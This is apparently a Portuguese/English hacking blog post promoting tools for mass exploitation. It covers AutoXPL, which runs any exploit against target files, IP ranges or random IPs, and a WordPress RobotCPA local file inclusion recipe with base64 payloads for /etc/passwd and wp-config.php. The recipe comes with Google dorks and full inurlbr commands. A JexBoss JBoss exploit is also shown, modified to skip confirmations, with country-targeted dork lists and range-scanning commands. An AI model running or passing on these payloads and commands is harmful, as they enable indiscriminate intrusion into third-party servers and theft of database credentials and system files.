AutoXPL - Executando comandos em massa

"T0" c0m mu1ta pr3guiça de faz3r um post na língu4 d0s gringo, v41 ser em PT-BR m3smo.

Venho trazer um script que vem a muito tempo quebrando meu galho quando se trata de exploração em massa, na questão motor, mas o que seria "motor" ?
Motor refiro-me quando temos um script que pode trazer alvos seja de um arquivo,banco de dados ou gerando dinamicamente.

É justamente isso que AutoXPL faz, ele executa outros exploits de forma massiva.
Suponhamos que você tenha um script básico que explora uma determinada falha SQLI de um server
onde você precisa passar via parâmetro o alvo e só, ele explora 1 para 1.

  [+] AUTOR:        googleINURL
  [+] EMAIL:        [email protected]
  [+] Blog:         http://blog.inurl.com.br
  [+] Twitter:      https://twitter.com/googleinurl
  [+] Fanpage:      https://fb.com/InurlBrasil
  [+] Pastebin      http://pastebin.com/u/Googleinurl
  [+] GIT:          https://github.com/googleinurl
  [+] PSS:          http://packetstormsecurity.com/user/googleinurl
  [+] YOUTUBE:      http://youtube.com/c/INURLBrasil
  [+] PLUS:         http://google.com/+INURLBrasil

Vamos usar um exemplo simples de ping um script dispara um ping contra o host

Exemplo de script 1 para  1:

./xpl.sh 'www.google.com.br'

Agora vamos executar via AutoXPL:

DOWNLOAD:

https://github.com/googleinurl/AutoXPL

MENU:

   -t                : SET TARGET.
   -f                : SET FILE TARGETS.
   --range           : SET RANGE IP.
   --range-rand      : SET NUMBE IP RANDOM.
   --xpl             : SET COMMAND XPL.
   Execute:
   php autoxpl.php -t target   --xpl './xpl _TARGET_'
   php autoxpl.php -f targets.txt  --xpl './xpl _TARGET_'
   php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl _TARGET_'
   php autoxpl.php --range-rand 20 --xpl './xpl _TARGET_'

Exemplo de script AutoXPL para  varios:

php autoxpl.php -f targets.txt --xpl './xpl.sh _TARGET_'

O parâmetro --xpl do script AutoXPL funciona executando um command line, assim possibilita até mesmo aviar um curl, nmap, sqlmap ou seja aquele exploit FTP, pois podemos gerar lista de IPs com o script.

Exemplo usando range de IP:
php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl.sh _TARGET_'

WordPress RobotCPA Plugin V5 - Local File Inclusion - MASS EXPLOIT INURLBR

Exploring theme Plugin RobotCPA V5 CMS wordpress

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Acess: https://www.exploit-db.com/exploits/37252/

The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.

POC:

string exploit:
php://filter/resource=./../../../wp-config.php
base64: cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

string exploit: 
file:///etc/passwd
base64: 
ZmlsZTovLy9ldGMvcGFzc3dk

Exemple Injetion:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}

Mass exploitation with inurlbr
using get exploration parameters and scanner internal encoder

Exemple:
--exploit-get {you_get}
--exploit-get  "&index.php?id=10'´0x27"

base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

Let's use:
--exploit-get "&l=base64(file:///etc/passwd)"
or
--exploit-get "&l=base64(php://filter/resource=./../../../wp-config.php)"

Dork:
inurl:"/wp-content/plugins/robotcpa/"
inurl:"plugins/robotcpa/f.php?l="

Complete command
php inurlbr.php --dork 'inurl:"plugins/robotcpa/f.php?l="' --exploit-get "&l=base64(file:///etc/passwd)" -s vuln.txt -q 1,2,3,64

Internal validation script inurlbr

Exploring the server password file...

LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including  files, that are already locally present on the server, through the  exploiting of vulnerable inclusion procedures implemented in the  application. 
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
Finding any of these values the script alert as vulnerable.
Exploring the server wp-config.php file...

CMS WORDPRESS
As the name suggests, if the web application doesn’t check the file name required by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary File Download vulnerability file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
Finding any of these values the script alert as vulnerable.

OUTPUT: 

Download:
http://github.com/googleinurl/SCANNER-INURLBR

JexBoss - Jboss Verify Tool - INURLBR Mass exploitation -

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

Requirements
Python <= 2.7.x

Installation
To install the latest version of JexBoss, please use the following commands:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

#  [ + ] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
#  [ + ] Updates: https://github.com/joaomatosf/jexboss
#  [ + ] SCRIPT original: http://1337day.com/exploit/23507 - http://77.120.105.55/exploit/23507
#  [ + ] Free for distribution and modification, but the authorship should be preserved.

Features
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.

The exploitation vectors are:

1. /jmx-console - tested and working in JBoss versions 4, 5 and 6
2. /web-console/Invoker- tested and working in JBoss versions 4
3. /invoker/JMXInvokerServlet- tested and working in JBoss versions 4 and 5

The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner 

All latches and test questions were withdrawn in order to be used in mass was added function to save vulnerable sites.

Mass Exploration: 

To do this we use the scanner inurlbr

https://github.com/googleinurl/SCANNER-INURLBR

Modified script for mass exploitation: 

https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py 

DORKS SEARCH 
inurl:"jmx-console/HtmlAdaptor"
inurl:"/web-console/Invoker"
inurl:"/invoker/JMXInvokerServlet"

COMMAND INURLBR:
- single search.--dork {YOU_DORK}

php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

- search using dorks file 

- File example with dorks:

site:br inurl:"jmx-console/HtmlAdaptor"
site:uk inurl:"jmx-console/HtmlAdaptor"

site:in inurl:"jmx-console/HtmlAdaptor"

site:ru inurl:"jmx-console/HtmlAdaptor"

site:pe inurl:"jmx-console/HtmlAdaptor"
site:br  inurl:"/web-console/Invoker"

site:uk  inurl:"/web-console/Invoker"

site:ru  inurl:"/web-console/Invoker"

site:us  inurl:"/web-console/Invoker"

site:com  inurl:"/web-console/Invoker"

So on .....

Exemple-> File: dorks.txt--dork-file {YOU_DORKFILE}

php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"


- Using to capture the range of ips--range {IP_START,IP_END}

php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"
- Range of ips random--range-rand {counter}

php inurlbr.php --range-rand '150' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

Exemple OUTPUT: